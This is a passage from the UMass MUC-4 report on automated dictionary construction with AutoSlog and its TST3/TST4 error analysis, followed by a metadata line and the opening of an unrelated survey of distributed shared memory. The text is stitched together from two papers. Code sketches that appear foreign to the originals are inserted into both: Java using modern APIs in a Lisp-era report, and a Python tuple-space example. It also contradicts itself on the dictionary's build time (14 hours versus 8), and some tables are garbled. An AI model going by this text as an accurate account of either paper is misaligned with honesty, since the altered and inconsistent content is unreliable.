Given our MUC-4 test results, we have demonstrated that an effective domain-dependent dictionary can be efficiently constructed using a representative text corpus accompanied by hand-coded template encodings. Our preliminary and very limited efforts have produced a dictionary that closely mirrors the functionality obtained by a relatively successful hand-crafted dictionary. Although the process of dictionary construction via AutoSlog is not totally automated, the manual labor needed can be completed in a matter of hours by a single individual with minimal expertise in dictionary construction. We consider this to be a significant step forward in the area of automated dictionary construction for text extraction applications.

AUTOMATED DICTIONARY CONSTRUCTION

The AutoSlog construction tool analyzes available key templates in conjunction with source texts and generates hypothesized CIRCUS definitions without human assistance. AutoSlog's proposed concept node definitions are derived from sentences in the MUC-4 development corpus that contain string fills associated with key templates. Using the complete 1300-text DEV corpus as the training set for our dictionary construction experiment, AutoSlog proposed 1356 concept node definitions in response to 1272 string-fill slots. Although a large number of these definitions were flawed or redundant, 28% of AutoSlog's proposed definitions were reasonable and could be included in an operational dictionary without alteration. In our experiment, 375 of the 1356 definitions proposed by AutoSlog were deemed acceptable when reviewed by visual inspection.

Each AutoSlog definition begins with a single string fill in a single key template. Given a specific slot, AutoSlog extracts the first non-empty string fill listed in the key template (string-fill slots often contain multiple strings based on multiple references within the source text). It then searches the source text for the first instance of that exact string. Once located, AutoSlog pulls the complete sentence containing that string from the source text and passes it to the CIRCUS sentence analyzer for syntactic analysis. CIRCUS analyzes the sentence using a part-of-speech dictionary. When all goes well, a set of buffers is instantiated with simple syntactic constituents corresponding to a subject, a verb, and possibly an object or a prepositional phrase. When the original string fill shows up in one of these buffers, AutoSlog hypothesizes a concept node definition complete with a lexical trigger, complement pattern, and slot constraints. This definition is then written to a file, and AutoSlog returns to the key template for the next string-fill slot. Figure 1 shows the AutoSlog construction tool in action.

[Figure 1: Automated Dictionary Construction]

The presence of string fills in key templates is a crucial requirement for AutoSlog. In fact, the more string-fill slots, the better. The MUC-4 templates contained six string-fill slots used by AutoSlog: inc-instr-id, perp-ind-id, perp-org-id, phys-tgt-id, hum-tgt-name, and hum-tgt-desc.
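The proposal step described above can be summarized in code. The sketch below is a loose Java rendering of that loop; every identifier is invented for illustration, and the real system is Lisp-based with far richer linguistic heuristics:

```java
import java.util.Map;

public class AutoSlogSketch {

    // Given the syntactic buffers CIRCUS filled for one sentence and the
    // answer-key string we are trying to explain, emit a candidate
    // concept-node pattern, or null if the answer is not in any buffer.
    static String proposeDefinition(Map<String, String> buffers, // e.g. "pp-by" -> "TERRORISTS"
                                    String answerString,
                                    String triggerVerb,
                                    boolean passiveVoice,
                                    String slotName) {           // e.g. "perpetrator"
        for (Map.Entry<String, String> e : buffers.entrySet()) {
            if (e.getValue().equalsIgnoreCase(answerString)) {
                // The buffer holding the answer tells us which syntactic
                // position the slot filler occupies relative to the trigger.
                String voice = passiveVoice ? "passive" : "active";
                return "trigger=" + triggerVerb + "; <" + slotName + "> in "
                        + e.getKey() + " of " + voice + " '" + triggerVerb + "'";
            }
        }
        return null;
    }

    public static void main(String[] args) {
        // "... PEASANTS ... HAVE BEEN KIDNAPPED BY TERRORISTS ..."
        Map<String, String> buffers = Map.of("subject", "PEASANTS", "pp-by", "TERRORISTS");
        System.out.println(proposeDefinition(buffers, "TERRORISTS", "KIDNAPPED", true, "perpetrator"));
    }
}
```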
After processing the 1300 texts of DEV, AutoSlog generated 136 definitions based on inc-instr-id, 316 definitions from perp-ind-id, 201 definitions from perp-org-id, 306 definitions from phys-tgt-id, 193 definitions from hum-tgt-name, and 204 definitions from hum-tgt-desc. This dictionary was compiled in 14 hours and then passed to a CIRCUS programmer for manual review. During the review process, each definition was dispatched into one of two possible states: (1) keep as is, or (2) save for possible revision. Files were maintained for the "keeps" and the "edits" with the expectation that the keep-definitions might be augmented by some number of edit-definitions if any of the edit-definitions could be salvaged. The initial categorization into "keeps" and "edits" was relatively fast because each definition could be categorized on the basis of visual inspection alone. Many definitions destined for the edit files were easy to spot, since they often resulted from parsing errors, patterns of no linguistic generality, or patterns of dubious reliability.

Here is an example of a good AutoSlog definition, generated from the first text in the development corpus:

```
Id: DEV-MUC3-0001
Trigger: KIDNAPPED
Trigger Root: KIDNAP
Syntactic-type: VERB
Slot filler: "TERRORISTS"
Sentence: THE ARCE BATTALION COMMAND HAS REPORTED THAT ABOUT 6650 PEASANTS
  OF VARIOUS AGES HAVE BEEN KIDNAPPED BY TERRORISTS OF THE FARABUNDO MARTI
  NATIONAL LIBERATION FRONT IN SAN MIGUEL DEPARTMENT
Name: %ACTOR-PASSIVE-VERB-PP-KIDNAPPED-BY%
Time limit: 10
Variable Slots: (ACTOR (*PP* IS-PREP? (BY)))
Constraints: ((CLASS ORGANIZATION *PP*)
              (CLASS TERRORIST *PP*)
              (CLASS PROPER-NAME *PP*)
              (CLASS HUMAN *PP*))
Constant Slots: (TYPE PERPETRATOR)
Enabling Conditions: ((PASSIVE))
```

This definition extracts slot fillers from constructions of the form "X is/was/has been kidnapped by Y." This particular definition will only pick up the conceptual actor Y; a separate definition is needed to pick up the conceptual victim X.

The following is an example of a bad AutoSlog definition: [definition not legible in the source]

As it stands, this definition hypothesizes that an active form of the verb "to be" predicts the victim of a kidnapping. Although the source sentence does legitimately suggest that the verb "to be" can be used to link human names with human descriptions, this proposed definition cannot be trusted to deliver a kidnapping victim.

When AutoSlog creates a new definition, it checks the existing set of previously proposed definitions to see if the current proposal duplicates an older one. AutoSlog does not produce multiple copies of the same definition. By tracking the number of duplicates AutoSlog suppresses, we can see evidence that the dictionary is approaching a saturation point. In particular, we note that after AutoSlog has processed 1200 texts, the next 100 texts generate only half as many definitions as the first 100 texts. Figure 2 shows the declining frequency of new dictionary definitions as we move through the development corpus.

Although the AutoSlog dictionary definitions are derived from only six template slots, consolidation and template-generation routines are capable of extracting the information needed to fill additional slots. When the AutoSlog dictionary operates in conjunction with the full system, we can fill every template slot except phys-tgt-nation, phys-tgt-effect, phys-tgt-total-num, and hum-tgt-total-num.
The 8-hour AutoSlog dictionary was completed only four weeks before the final testing for MUC-4. Now that we have seen how much impact AutoSlog can have on the process of dictionary construction, it makes sense to pursue enhancements to AutoSlog in order to strengthen its baseline performance. As it stands, AutoSlog can be moved to new domains with a minimal amount of software tuning. Adjustments must be made to handle a new template design, but any templates that contain string fills will serve to fuel dictionary construction.

Figure 2: Dictionary Saturation Under AutoSlog

TST3 ERROR ANALYSIS

We have conducted a post hoc analysis of our system's performance on TST3 in order to better understand the various problems encountered there. Most of this data describes the behavior of CIRCUS, its use of concept node definitions, and the effects of memory-based consolidation. As detailed and useful as the score reports are, they are not designed to tease apart the performance contributions of a sentence analyzer, discourse analyzer, or template generator. Subcomponents like these must be analyzed separately if we want to understand where to focus future development efforts.

Recall Limitations

The dictionary used by the official UMass/MUC-4 system contained 389 concept node definitions. Of these, 172 (44%) were enabled [2] in processing TST3. On average, each definition was enabled nearly 9 times, for a total of 1515 concept node enablements (~15 per text on average). For TST3, CIRCUS extracted 943 string fills for variable slots in enabled concept nodes. Because there are many redundant concept node definitions, almost half of these string fills were duplicates, leaving 520 unique string fills extracted by CIRCUS. According to our analysis, 214 of these string fills were discarded during consolidation and 306 string fills made it into a response template.

Of the 520 non-redundant string fills, 38% were correctly incorporated into a response template, where they matched the string or strings listed in a key template. A full 34% were correctly discarded or merged by consolidation (and therefore did not make it into a response template). The sum of these instances accounts for 72% of the total string fills, all handled correctly by consolidation. Of the remaining string fills, 21% appeared in response templates as spurious slot fills, and 7% were incorrectly discarded.

Of the 237 string fills that did legitimately correspond to slot fills in key templates, consolidation correctly incorporated 199 (84%) into response templates. Even so, our overall recall score was only 46%. Where are the other string fills? Our analysis shows that CIRCUS generated 225 good (full match) string fills and 12 partially good (partial match) string fills. According to the score report, there were 416 possible string fills for TST3. That tells us CIRCUS is producing only 55% of the possible string fills for TST3. This 55% hit rate effectively imposes a rough ceiling on our overall recall, and suggests that significant gains in recall will require stronger performance levels during sentence analysis.
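As a sanity check on these figures (assuming, as in MUC scoring, that partial matches receive half credit), the sentence-analysis hit rate and the consolidation rate combine to roughly the observed recall:

\[
\frac{225 + 0.5 \times 12}{416} \approx 0.55,
\qquad
0.55 \times 0.84 \approx 0.46
\]

which is consistent with the 46% overall recall cited above.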
PRECISION LIMITATIONS

When we examine the 306 string fills present in our TST3 response templates, we find that 187 could be matched to slot fills in some key template and 12 could be partially matched to a key template slot fill. If all of these string fills were in correct slots and correct templates, our string-fill precision would be 63%. But only 142 string fills result in full matches with key template slots, and 24 result in partial matches. Of the 107 strings that can't be matched to any key template, we have found the following breakdown of errors:

- 49 (46%) should have been discarded as irrelevant
- 16 (15%) were from mis-fired concept node definitions
- 15 (14%) were from parser errors
- 14 (13%) should have been merged with a more specific string
- 12 (11%) were from words not covered adequately by the dictionary
- 1 (1%) was from a source string altered by preprocessing

[Footnote 2: An enabled concept node is one that produces a case frame instantiation. All output generated by CIRCUS is based on enabled concept nodes.]

Of the 49 false hits associated with relevancy discriminations, our single greatest precision error came from 30 false hits on military clashes. After that, four general problem areas were about equally responsible for a significant number of errors: (1) false hits associated with faulty concept node definitions, (2) CIRCUS sentence analysis errors, (3) consolidation merging failures, and (4) inadequate dictionary coverage.

Dictionary Coverage

Although inadequate dictionary coverage was identified as a source of visible precision loss, we have been remarkably well served by a relatively small dictionary of 5436 lexical items augmented by 2102 proper names. An analysis of the TST3 lexicon shows that 1008 words appearing in TST3 were not recognized by our system. Of these, 696 occurred only once. Of the remaining 312 words, the vast majority were proper names. A visual inspection of the unrecognized word list suggested that our lexicon was adequate for the demands of TST3. However, this does not mean that all of our associated definitions were above reproach. Although our dictionary contains a total of 389 concept node definitions, only 172 of these were used during TST3. A frequency analysis of these 172 definitions showed that 20% of the definitions generated 74% of the string fills. A total of 37 (22%) concept node definitions failed to produce any string fills (perhaps these contain no variable slots, or maybe their output was discarded during consolidation), while one concept node definition produced 65 string fills, and three others each produced over 50 string fills. Figure 3 shows the complete frequency distribution.

Comparing TST3 and TST4

Although our F-scores suggest dramatic differences between TST3 and TST4, there appears to be a single factor responsible for these divergent score summaries. Table 2 shows a more detailed perspective on the differences and similarities between TST3 and TST4. Reviewing the scores in Table 2, we see a remarkable similarity across most of the scores for TST3 and TST4. TST4 was even better than TST3 under String Fills Only. The major differences appear in the precision and overgeneration scores for Matched/Spurious and All Templates. These differences also correspond to a striking difference in the number of spurious templates generated for TST3 (16) and TST4 (31). Looking deeper into the problem, we determined that two factors seemed to contribute to the large number of spurious templates in TST4.
Table 2: TST3 and TST4 score reports from the official UMass/MUC-4 test runs <table> <thead> <tr> <th></th> <th>TST3</th> <th>TST4</th> </tr> </thead> <tbody> <tr> <td></td> <td>REC</td> <td>PRE</td> </tr> <tr> <td>MATCHED/MISSING</td> <td>47</td> <td>67</td> </tr> <tr> <td>MATCHED/SPURIOUS</td> <td>60</td> <td>57</td> </tr> <tr> <td>MATCHED/ONLY</td> <td>60</td> <td>67</td> </tr> <tr> <td>ALL TEMPLATES</td> <td>47</td> <td>52</td> </tr> <tr> <td>SET FILLS ONLY</td> <td>50</td> <td>71</td> </tr> <tr> <td>STRING FILLS ONLY</td> <td>37</td> <td>57</td> </tr> <tr> <td>F-SCORES</td> <td>51.52</td> <td>54.67</td> </tr> </tbody> </table> First, many legitimate templates were deemed spurious because of mapping problems. We can see some evidence of this by running a comparative test designed to assess the impact of templates lost due to incorrect incident-type slot fills. In the comparative test, we will use "ATTACK" as the slot fill for all incident-type slots. This will ensure that no template is deemed spurious because an incident-type is blocking it from being mapped to a key template. Table 3 shows the resulting F scores from comparative test runs for both TST3 and TST4, running the official UMass/MUC-4 system and generating batch score reports throughout. <table> <thead> <tr> <th></th> <th>P&amp;R</th> <th>2P&amp;R</th> <th>P&amp;2R</th> </tr> </thead> <tbody> <tr> <td>TST3 - official system</td> <td>46.47</td> <td>49.64</td> <td>43.68</td> </tr> <tr> <td>TST3 - &quot;all attacks&quot; is on</td> <td>45.46</td> <td>48.63</td> <td>42.67</td> </tr> <tr> <td>TST4 - official system</td> <td>39.44</td> <td>38.56</td> <td>40.36</td> </tr> <tr> <td>TST4 - &quot;all attacks&quot; is on</td> <td>40.98</td> <td>40.38</td> <td>41.58</td> </tr> </tbody> </table> Table 3: The Effect of Spurious Templates Lost to Incorrect Incident-Types In comparing the net effect of the "all attacks" heuristic, we find that there is no advantage to any of the F-scores when all templates are typed as attacks in TST3. Indeed, there is a uniform drop of one point across the board when "all attacks" is turned on. On the other hand, the F scores for TST4 all benefit from the "all attacks" heuristic. P&R goes up 1.54, 2P&R goes up 1.82, and P&2R goes up 1.22. This tells us that we did not tend to lose otherwise legitimate templates because of their incident types in TST3, whereas a significant number of legitimate templates were lost for this reason in TST4. Precision is most dramatically affected by these errors, but P&R may have lost at least 2 points because of this problem (it is not possible to extrapolate from batch scores to interactive scores with complete certainty). Second, a large number of spurious templates were created when military targets were not recognized to be military in nature. We have already seen how military clashes were the single greatest source of spurious string fills in TST3. Even so, we generated only 3 spurious templates due to false hits on military targets in TST3. In TST4 we generated 12 spurious templates for the same reason. If we assume that each spurious template contains 11 slot fills (a reasonable assumption when template filtering is in place), it follows that 132 spurious slot fills are coming from false hits on military targets in TST4. Removing 132 spurious slot fills from the TST4 score report, the precision score under All Templates goes from 42 to 48, and the P&R score goes up about 3 points as a result. 
RESOURCES, SPIN-OFFS, AND FUTURE RESEARCH

Our primary system development and testing took place on three Texas Instruments Explorer II workstations, each configured with 8 megabytes of RAM. Two Texas Instruments MicroExplorers, each with 8 megabytes of RAM, were used for the development of the AutoSlog lexicon. All development was done in Common Lisp. The system code and lexicons required 14 megabytes of storage on a Vax VMS fileserver, 8 of which comprised the AutoSlog development files. System output was stored on a Decstation running Ultrix, where the scoring program was run. System testing required 250 megabytes of storage for response files and score reports. The two official test sets, TST3 and TST4, each took about 75 minutes to process on an Explorer II, using the workstation's local disk for all file output.

The development of our UMass/MUC-4 system has continued off and on for two years now. Last year we estimated that 2.25 person-years were invested in the UMass/MUC-3 system. This year we were able to build on that investment and focus our effort more effectively on the critical issues of portability and scalability. All told, we estimate that one person/year of effort went into MUC-4 after MUC-3: 30% on testing, maintenance, and data analysis; 30% on CIRCUS enhancements and dictionaries; 15% on memory-based consolidation; 15% on MUC-4 updates and documentation; and 10% on training for new personnel.

In the period since MUC-3, a number of related research projects have been pursued that did not directly contribute to MUC-4, but which address basic research issues associated with CIRCUS and text extraction systems. We have demonstrated that case-based reasoning and machine learning techniques can be successfully applied to the disambiguation of relative pronouns [1, 2, 3]; experiments have shown how CIRCUS can be used to support relevancy feedback algorithms for text classification [5]; and additional experiments have been conducted with a stochastic database derived from the MUC-3 corpus [4]. We expect to see similarly successful spin-offs from MUC-4 in the areas of automated dictionary construction and automated system scale-up. We will continue to exploit the MUC-3 corpus in pursuing these new directions, and we expect to gain additional experience with at least one new application domain as well.

ACKNOWLEDGEMENTS

This work was supported in part by the Defense Advanced Research Projects Agency and monitored by Science Applications International Corporation under contract No. N666001-90-D-0192; DO#22.

BIBLIOGRAPHY
{"Source-Url": "https://apps.dtic.mil/dtic/tr/fulltext/u2/a458574.pdf", "len_cl100k_base": 6249, "olmocr-version": "0.1.50", "pdf-total-pages": 9, "total-fallback-pages": 0, "total-input-tokens": 23846, "total-output-tokens": 7046, "length": "2e12", "weborganizer": {"__label__adult": 0.0005078315734863281, "__label__art_design": 0.0005326271057128906, "__label__crime_law": 0.0009441375732421876, "__label__education_jobs": 0.00518798828125, "__label__entertainment": 0.0002359151840209961, "__label__fashion_beauty": 0.00030684471130371094, "__label__finance_business": 0.0004153251647949219, "__label__food_dining": 0.0004892349243164062, "__label__games": 0.0007615089416503906, "__label__hardware": 0.0010662078857421875, "__label__health": 0.001087188720703125, "__label__history": 0.0006470680236816406, "__label__home_hobbies": 0.00014340877532958984, "__label__industrial": 0.0007266998291015625, "__label__literature": 0.0029850006103515625, "__label__politics": 0.0006608963012695312, "__label__religion": 0.0007462501525878906, "__label__science_tech": 0.273681640625, "__label__social_life": 0.0003409385681152344, "__label__software": 0.027008056640625, "__label__software_dev": 0.68017578125, "__label__sports_fitness": 0.00033593177795410156, "__label__transportation": 0.0005855560302734375, "__label__travel": 0.0002114772796630859}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 27368, 0.06937]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 27368, 0.1639]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 27368, 0.90878]], "google_gemma-3-12b-it_contains_pii": [[0, 3989, false], [3989, 5203, null], [5203, 9884, null], [9884, 12384, null], [12384, 14318, null], [14318, 17922, null], [17922, 20437, null], [20437, 24250, null], [24250, 27368, null]], "google_gemma-3-12b-it_is_public_document": [[0, 3989, true], [3989, 5203, null], [5203, 9884, null], [9884, 12384, null], [12384, 14318, null], [14318, 17922, null], [17922, 20437, null], [20437, 24250, null], [24250, 27368, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 27368, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 27368, null]], "pdf_page_numbers": [[0, 3989, 1], [3989, 5203, 2], [5203, 9884, 3], [9884, 12384, 4], [12384, 14318, 5], [14318, 17922, 6], [17922, 20437, 7], [20437, 24250, 8], [24250, 27368, 9]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 27368, 0.17483]]}
olmocr_science_pdfs
2024-11-28
2024-11-28
7e465931138e32ac0f6049b9d1648ded5501d176
Distributed Shared Memory: A Survey of Issues and Algorithms Bill Nitzberg and Virginia Lo, University of Oregon As we slowly approach the physical limits of processor and memory speed, it is becoming more attractive to use multiprocessors to increase computing power. Two kinds of parallel processors have become popular: tightly coupled shared-memory multiprocessors and distributed-memory multiprocessors. A tightly coupled multiprocessor system — consisting of multiple CPUs and a single global physical memory — is more straightforward to program because it is a natural extension of a single-CPU system. However, this type of multiprocessor has a serious bottleneck: Main memory is accessed via a common bus — a serialization point — that limits system size to tens of processors. Distributed-memory multiprocessors, however, do not suffer from this drawback. These systems consist of a collection of independent computers connected by a high-speed interconnection network. If designers choose the network topology carefully, the system can contain many orders of magnitude more processors than a tightly coupled system. Because all communication between concurrently executing processes must be performed over the network in such a system, until recently the programming model was limited to a message-passing paradigm. However, recent systems have implemented a shared-memory abstraction on top of message-passing distributed-memory systems. The shared-memory abstraction gives these systems the illusion of physically shared memory and allows programmers to use the shared-memory paradigm. As Figure 1 shows, distributed shared memory provides a virtual address space shared among processes on loosely coupled processors. The advantages offered by DSM include ease of programming and portability achieved through the shared-memory programming paradigm, the low cost of distributed-memory machines, and scalability resulting from the absence of hardware bottlenecks. DSM has been an active area of research since the early 1980s, although its foundations in cache coherence and memory management have been extensively studied for many years. DSM research goals and issues are similar to those of research in multiprocessor caches or networked file systems, memories for nonuniform memory access multiprocessors, and management systems for distributed or replicated databases. Because of this similarity, many algorithms and lessons learned in these domains can be transferred to DSM systems and vice versa. However, each of the above systems has unique features (such as communication latency), so each must be considered separately. The advantages of DSM can be realized with reasonably low runtime overhead. DSM systems have been implemented using three approaches (some systems use more than one approach): (1) hardware implementations that extend traditional caching techniques to scalable architectures. (2) operating system and library implementations that achieve sharing and coherence through virtual memory-management mechanisms, and (3) compiler implementations where shared accesses are automatically converted into synchronization and coherence primitives. These systems have been designed on common networks of workstations or minicomputers, special-purpose message-passing machines (such as the Intel iPSC/2), custom hardware, and even heterogeneous systems. This article gives an integrated overview of important DSM issues: memory coherence, design choices, and implementation methods. 
In our presentation, we use examples from the DSM systems listed and briefly described in the sidebar on page 55. Table 1 compares how design issues are handled in a selected subset of the systems.

Design choices

A DSM system designer must make choices regarding structure, granularity, access, coherence semantics, scalability, and heterogeneity. Examination of how designers handled these issues in several real implementations of DSM shows the intricacies of such a system.

Structure and granularity. The structure and granularity of a DSM system are closely related. Structure refers to the layout of the shared data in memory. Most DSM systems do not structure memory (it is a linear array of words), but some structure the data as objects, language types, or even an associative memory. Granularity refers to the size of the unit of sharing: byte, word, page, or complex data structure. Ivy, one of the first transparent DSM systems, implemented shared memory as virtual memory. This memory was unstructured and was shared in 1-kbyte pages. In systems implemented using the virtual memory hardware of the underlying architecture, it is convenient to choose a multiple of the hardware page size as the unit of sharing. Mirage extended Ivy's single shared-memory space to support a paged segmentation scheme. Users share arbitrary-size regions of memory (segments) while the system maintains the shared space in pages.

Hardware implementations of DSM typically support smaller grain sizes. For example, Dash and Memnet also support unstructured sharing, but the unit of sharing is 16 and 32 bytes respectively — typical cache line sizes. Plus is somewhat of a hybrid: The unit of replication is a page, while the unit of coherence is a 32-bit word.

Because shared-memory programs exhibit locality of reference, a process is likely to access a large region of its shared address space in a small amount of time. Therefore, larger "page" sizes reduce paging overhead. However, sharing may also cause contention, and the larger the page size, the greater the likelihood that more than one process will require access to a page. A smaller page reduces the possibility of false sharing, which occurs when two unrelated variables (each used by different processes) are placed in the same page. The page appears shared, even though the original variables were not. Another factor affecting the choice of page size is the need to keep directory information about the pages in the system: the smaller the page size, the larger the directory.

A method of structuring the shared memory is by data type. With this method, shared memory is structured as objects in distributed object-oriented systems, as in the Emerald, Choices, and Clouds systems; or it is structured as variables in the source language, as in the Shared Data-Object Model and Munin systems. Because with these systems the sizes of objects and data types vary greatly, the grain size varies to match the application. However, these systems can still suffer from false sharing when different parts of an object (for example, the top and bottom halves of an array) are accessed by distinct processes.

Another method is to structure the shared memory like a database. Linda, a system that has such a model, orders its shared memory as an associative memory called a tuple space. This structure allows the location of data to be separated from its value, but it also requires programmers to use special access functions to interact with the shared-memory space.
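To make the phrase "special access functions" concrete, the following toy sketch mimics Linda-style out/rd/in operations on an in-process tuple space. The class and helper names are invented for illustration; a real Linda implementation would hash and distribute tuples across nodes rather than scan a local list.

```python
# A toy, single-process illustration of Linda-style tuple-space access
# functions: out deposits a tuple, rd copies a matching tuple, in withdraws it.
# This only shows why access goes through functions rather than ordinary
# reads and writes of shared variables; it is not a distributed implementation.

class TupleSpace:
    def __init__(self):
        self._tuples = []

    def out(self, *fields):
        """Deposit a tuple into the space."""
        self._tuples.append(tuple(fields))

    def _match(self, pattern):
        # None acts as a wildcard field in the pattern.
        for t in self._tuples:
            if len(t) == len(pattern) and all(p is None or p == f for p, f in zip(pattern, t)):
                return t
        return None

    def rd(self, *pattern):
        """Return a copy of a matching tuple without removing it."""
        return self._match(pattern)

    def in_(self, *pattern):
        """Withdraw (remove and return) a matching tuple ('in' is reserved in Python)."""
        t = self._match(pattern)
        if t is not None:
            self._tuples.remove(t)
        return t

space = TupleSpace()
space.out("count", 42)
print(space.rd("count", None))   # ('count', 42): data is looked up by content, not address
print(space.in_("count", None))  # withdraws the tuple from the space
```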
In most other systems, access to shared data is transparent. Coherence semantics. For programmers to write correct programs on a shared-memory machine, they must understand how parallel memory updates are propagated throughout the <table> <thead> <tr> <th>System Name</th> <th>Current Implementation</th> <th>Structure and Granularity</th> <th>Coherence Semantics</th> <th>Coherence Protocol</th> <th>Sources of Improved Performance</th> <th>Support for Synchronization</th> <th>Heterogeneous Support</th> </tr> </thead> <tbody> <tr> <td>Dash</td> <td>Hardware, modified Silicon Graphics Iris 4D/340 workstations, mesh</td> <td>16 bytes</td> <td>Release</td> <td>Write-invalidate</td> <td>Relaxed coherence, prefetching</td> <td>Queued locks, atomic incrementation and decrementation</td> <td>No</td> </tr> <tr> <td>Ivy</td> <td>Software, Apollo workstations, Apollo ring, modified Aegis</td> <td>1-Kbyte pages</td> <td>Strict</td> <td>Write-invalidate</td> <td>Pointer chain collapse, selective broadcast</td> <td>Synchronized pages, semaphores, event counts</td> <td>No</td> </tr> <tr> <td>Linda</td> <td>Software, variety of environments</td> <td>Tuples</td> <td>No mutable data</td> <td>Varied</td> <td>Hashing</td> <td>?</td> <td></td> </tr> <tr> <td>Memnet</td> <td>Hardware, token ring</td> <td>32 bytes</td> <td>Strict</td> <td>Write-invalidate</td> <td>Vectored interrupt support of control flow</td> <td>Messages for semaphores and signal/wait</td> <td>Yes</td> </tr> <tr> <td>Mermaid</td> <td>Software, Sun workstations, DEC Firefly multiprocessors, Mermaid/native operating system</td> <td>8 Kbytes (Sun), 1 Kbyte (Firefly)</td> <td>Strict</td> <td>Write-invalidate</td> <td></td> <td></td> <td>No</td> </tr> <tr> <td>Mirage</td> <td>Software, VAX 11/750, Ethernet, Locus distributed operating system, Unix System V interface</td> <td>512-byte pages</td> <td>Strict</td> <td>Write-invalidate</td> <td>Kernel-level implementation, time window coherence protocol</td> <td>Unix System V semaphores</td> <td>No</td> </tr> <tr> <td>Munin</td> <td>Software, Sun workstations, Ethernet, Unix System V kernel and Presto parallel programming environment</td> <td>Objects</td> <td>Weak</td> <td>Type-specific (delayed write update for read-mostly protocol)</td> <td>Delayed update queue</td> <td>Synchronized objects</td> <td>No</td> </tr> <tr> <td>Plus</td> <td>Hardware and software, Motorola 88000, Caltech mesh, Plus kernel</td> <td>Page for sharing, word for coherence</td> <td>Processor</td> <td>Nondemand write-update</td> <td>Delayed operations</td> <td>Complex synchronization instructions</td> <td>No</td> </tr> <tr> <td>Shiva</td> <td>Software, Intel iPSC/2, hypercube, Shiva/native operating system</td> <td>4-Kbyte pages</td> <td>Strict</td> <td>Write-invalidate</td> <td>Data structure compaction, memory as backing store</td> <td>Messages for semaphores and signal/wait</td> <td>No</td> </tr> </tbody> </table> The most intuitive semantics for memory coherence is strict consistency. (Although "coherence" and "consistency" are used somewhat interchangeably in the literature, we use coherence as the general term for the semantics of memory operations, and consistency to refer to a specific kind of memory coherence.) In a system with strict consistency, a read operation returns the most recently written value. However, "most recently" is an ambiguous concept in a distributed system. For this reason, and to improve performance, some DSM systems provide only a reduced form of memory coherence. 
For example, Plus provides processor consistency, and Dash provides only release consistency. In accordance with the RISC philosophy, both of these systems have mechanisms for forcing coherence, but their use must be explicitly specified by higher level software (a compiler) or perhaps even the programmer. Relaxed coherence semantics allows more efficient shared access because it requires less synchronization and less data movement. However, programs that depend on a stronger form of coherence cannot perform correctly if executed in a system that supports only a weaker form. Figure 2 gives brief definitions of strict, sequential, processor, weak, and release consistency, and illustrates the hierarchical relationship among these types of coherence. Table 1 indicates the coherence semantics supported by some current DSM systems.

![Diagram showing consistency types]

**Figure 2. Intuitive definitions of memory coherence. The arrows point from stricter to weaker consistencies.**

**DSM systems**

This partial listing gives the name of the DSM system, the principal developers of the system, the site and duration of their research, and a brief description of the system. Table 1 gives more information about the systems followed by an asterisk.

Agora (Bisiani and Forin, Carnegie Mellon University, 1987-): A heterogeneous DSM system that allows data structures to be shared across machines. Agora was the first system to support weak consistency.

Amber (Chase, Feeley, and Levy, University of Washington, 1988-): An object-based DSM system in which sharing is performed by migrating processes to data as well as data to processes.

Capnet (Tam and Farber, University of Delaware, 1990-): An extension of DSM to a wide area network.

Choices (Johnston and Campbell, University of Illinois, 1988-): DSM incorporated into a hierarchical object-oriented distributed operating system.

Clouds (Ramachandran and Khalidi, Georgia Institute of Technology, 1987-): An object-oriented distributed operating system where objects can migrate.

Dash* (Lenoski, Laudon, Gharachorloo, Gupta, and Hennessy, Stanford University, 1988-): A hardware implementation of DSM with a directory-based coherence protocol. Dash provides release consistency.

Emerald (Jul, Levy, Hutchinson, and Black, University of Washington, 1986-1988): An object-oriented language and system that indirectly supports DSM through object mobility.

Ivy* (Li, Yale University, 1984-1986): An early page-oriented DSM on a network of Apollo workstations.

Linda* (Carriero and Gelernter, Yale University, 1982-): A shared associative object memory with access functions. Linda can be implemented for many languages and machines.

Memnet* (Delp and Farber, University of Delaware, 1986-1988): A hardware implementation of DSM implemented on a 200-Mbps token ring used to broadcast invalidates and read requests.

Mermaid* (Stumm, Zhou, Li, and Wortman, University of Toronto and Princeton University, 1988-1991): A heterogeneous DSM system where the compiler forces shared pages to contain a single data type. Type conversion is performed on reference.

Mether (Minnich and Farber, Supercomputing Research Center, Bowie, Md., 1990-): A transparent DSM based on SunOS 4.0. Mether allows applications to access an inconsistent state for efficiency.

Mirage* (Fleisch and Popek, University of California at Los Angeles, 1987-1989): A kernel-level implementation of DSM. Mirage reduces thrashing by prohibiting a page from being stolen before a minimum amount of time (Δ) has elapsed.
Munin* (Bennett, Carter, and Zwaenepoel, Rice University, 1988-): An object-based DSM system that investigates type-specific coherence protocols.

Plus* (Bisiani and Ravishankar, Carnegie Mellon University, 1988-): A hardware implementation of DSM. Plus uses a write-update coherence protocol and performs replication only by program request.

Shared Data-Object Model (Bal, Kaashoek, and Tanenbaum, Vrije Universiteit, Amsterdam, The Netherlands, 1988-): A DSM implementation on top of the Amoeba distributed operating system.

Shiva* (Li and Schaefer, Princeton University, 1988-): An Ivy-like DSM system for the Intel iPSC/2 hypercube.

